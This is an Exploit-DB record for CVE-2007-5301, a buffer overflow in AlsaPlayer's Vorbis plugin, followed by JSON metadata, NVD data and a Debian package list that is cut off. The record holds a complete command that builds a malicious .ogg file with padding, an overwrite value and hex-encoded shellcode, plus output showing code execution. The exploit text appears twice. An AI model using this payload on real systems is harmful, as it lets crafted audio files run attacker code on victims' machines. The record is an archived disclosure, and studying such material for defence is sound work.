ID EDB-ID:5424Type exploitdbReporter Albert SellaresModified 2008-04-10T00:00:00
Description
Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform
I have released this exploit for the alsaplayer bug CVE-2007-5301.
You can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/
With my modified version of vorbiscomment, you can generate a ogg exploit like this:
whats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\x77\xe7
\xff\xff\x08\x08\x08\x08\x29\xc9\x83\xe9\xf4\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e
\x46\x90\xbe\x13\x83\xee\xfc\xe2\xf4\x2c\x9b\xe6\x8a\x14\xf6\xd6\x3e\x25\x19\x59\x7b
\x69\xe3\xd6\x13\x2e\xbf\xdc\x7a\x28\x19\x5d\x41\xae\x9c\xbe\x13\x46\xbf\xcb\x60\x34
\xbf\xdc\x7a\x28\xbf\xd7\x77\x46\xc7\xed\x9a\xa7\x5d\x3e\x13"')" /usr/share/games/pydance/sound/back.ogg exploit.ogg
Then, if you plays the file with the vulnerable version:
whats@debian:~$ alsaplayer exploit.ogg
uid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)
This was tested with the debian etch packages.
- whats
# milw0rm.com [2008-04-10]
{"published": "2008-04-10T00:00:00", "id": "EDB-ID:5424", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "hash": "7d58477a118e391dd57a66e35ed9f188b7a38584a52aef59948e151774e4a36c", "description": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit. CVE-2007-5301. Local exploit for linux platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/5424/", "lastseen": "2016-01-31T23:06:14", "edition": 1, "title": "Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow Exploit", "osvdbidlist": [], "modified": "2008-04-10T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "sourceHref": "https://www.exploit-db.com/download/5424/", "references": [], "reporter": "Albert Sellares", "sourceData": "I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t \"TITLE=$(perl -e 'print \"AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n\\xff\\xff\\x08\\x08\\x08\\x08\\x29\\xc9\\x83\\xe9\\xf4\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\r\n\\x46\\x90\\xbe\\x13\\x83\\xee\\xfc\\xe2\\xf4\\x2c\\x9b\\xe6\\x8a\\x14\\xf6\\xd6\\x3e\\x25\\x19\\x59\\x7b\r\n\\x69\\xe3\\xd6\\x13\\x2e\\xbf\\xdc\\x7a\\x28\\x19\\x5d\\x41\\xae\\x9c\\xbe\\x13\\x46\\xbf\\xcb\\x60\\x34\r\n\\xbf\\xdc\\x7a\\x28\\xbf\\xd7\\x77\\x46\\xc7\\xed\\x9a\\xa7\\x5d\\x3e\\x13\"')\" /usr/share/games/pydance/sound/back.ogg exploit.ogg \r\n\r\nThen, if you plays the file with the vulnerable version:\r\n\r\nwhats@debian:~$ alsaplayer exploit.ogg\r\nuid=1000(whats) gid=1000(whats) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(whats)\r\n\r\nThis was tested with the debian etch packages.\r\n\r\n- whats\r\n\r\n# milw0rm.com [2008-04-10]\r\n", "objectVersion": "1.0"}
{"result": {"cve": [{"lastseen": "2017-09-29T14:25:33", "references": ["http://www.vupen.com/english/advisories/2007/3393", "https://www.exploit-db.com/exploits/5424", "https://exchange.xforce.ibmcloud.com/vulnerabilities/36996", "http://www.securityfocus.com/archive/1/archive/1/490671/100/0/threaded", "http://www.securityfocus.com/bid/25969", "http://www.wekk.net/research/CVE-2007-5301/CVE-2007-5301-exploit.sh", "http://sourceforge.net/forum/forum.php?forum_id=742584", "http://www.debian.org/security/2008/dsa-1538", "http://sourceforge.net/project/shownotes.php?release_id=544663&group_id=249"], "description": "Buffer overflow in the vorbis_stream_info function in input/vorbis/vorbis_engine.c (aka the vorbis input plugin) in AlsaPlayer before 0.99.80-rc3 allows remote attackers to execute arbitrary code via a .OGG file with long comments.", "edition": 3, "reporter": "NVD", "published": "2007-10-09T14:17:00", "title": "CVE-2007-5301", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:25:33", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2007-5301"], "scanner": [], "modified": "2017-09-28T21:29:33", "cpe": ["cpe:/a:alsaplayer:alsaplayer:0.99.80-rc2"], "id": "CVE-2007-5301", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5301", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2016-09-02T18:30:05", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-jack", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-nas", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-common", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-xosd", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-common", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-text", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-text", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-alsa", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-daemon", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-esd", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_hppa.deb", "packageName": "libalsaplayer-dev", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-text", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-esd", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-alsa", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-jack", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-daemon", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-text", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1.diff", "packageFilename": "alsaplayer_0.99.76-9+etch1.diff.gz", "packageName": "alsaplayer", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-esd", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-text", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-oss", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_arm.deb", "packageName": "libalsaplayer-dev", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-nas", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-xosd", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_ia64.deb", "packageName": "libalsaplayer0", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-common", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-xosd", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-oss", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_i386.deb", "packageName": "libalsaplayer0", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-alsa", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-common", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_amd64.deb", "packageName": "libalsaplayer-dev", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-text", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-nas", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-oss", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-daemon", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-common", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-nas", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-common_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-common", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_s390.deb", "packageName": "libalsaplayer-dev", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_amd64.deb", "packageName": "libalsaplayer0", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-oss", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-gtk", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_powerpc.deb", "packageName": "libalsaplayer-dev", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-alsa", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-xosd", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-daemon", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-gtk", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_amd64.deb", "packageName": "alsaplayer-jack", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-gtk", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-gtk", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-alsa", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_s390.deb", "packageName": "alsaplayer-daemon", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-daemon", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-alsa_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-alsa", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-gtk", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_i386.deb", "packageName": "alsaplayer-oss", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_mipsel.deb", "packageName": "alsaplayer-gtk", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-jack", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-esd", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-gtk", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-jack", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-nas_0.99.76-9+etch1_alpha.deb", "packageName": "alsaplayer-nas", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-text", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer0_0.99.76-9+etch1_s390.deb", "packageName": "libalsaplayer0", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "libalsaplayer-dev_0.99.76-9+etch1_sparc.deb", "packageName": "libalsaplayer-dev", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_sparc.deb", "packageName": "alsaplayer-esd", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_hppa.deb", "packageName": "alsaplayer-jack", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-gtk_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-gtk", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-oss_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-oss", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-jack_0.99.76-9+etch1_powerpc.deb", "packageName": "alsaplayer-jack", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-esd_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-esd", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-daemon_0.99.76-9+etch1_arm.deb", "packageName": "alsaplayer-daemon", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-xosd_0.99.76-9+etch1_mips.deb", "packageName": "alsaplayer-xosd", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "4", "packageVersion": "0.99.76-9+etch1", "packageFilename": "alsaplayer-text_0.99.76-9+etch1_ia64.deb", "packageName": "alsaplayer-text", "arch": "ia64", "operator": "lt"}, {"OS": 